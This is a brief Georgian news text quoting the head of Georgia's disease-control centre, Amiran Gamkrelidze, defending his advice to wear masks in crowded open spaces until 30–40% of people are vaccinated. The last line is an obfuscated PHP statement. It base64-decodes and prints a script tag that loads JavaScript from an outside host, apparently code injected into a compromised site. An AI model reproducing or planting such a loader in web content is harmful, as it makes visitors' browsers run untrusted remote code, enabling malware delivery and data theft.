celsiusi
ავერსი საქკაბელი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელი ამირან გამყელიძე, ჟურნალისტებთან საუბრისას მისივე განცხადებაზე კრიტიკას გამოეხმაურა, სადაც ის აღნიშნავდა, რომ ზღვაში ბანაობის დროს პირბადე არ უნდა გეკეთოს, მაგრამ ხალხმრავალ ადგილზე მისი გამოყენება აუცილებელია.
 
მისივე განმარტებით, კრიტიკის მიუხედავად, ის მოსახლეობას რეკომენდაციების დაცვისკენ სულ მოუწოდებს.
 
„ბევრს მაკრიტიკებენ, მაკრიტიკონ, არაუშავს. მე სულ უნდა მოვუწოდო მოსახლეობას. ბათუმის ბულვარზე გამაკრიტიკეს. კარგით, მე ამას ავიტან, მაგრამ ხაზს ვუსვამ, ვიდრე 30-40% არ აიცრება, პირბადე ღია სივრცეებში დაგვჭირდება“,-აღნიშნავს გამყრელიძე.
 
1336
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");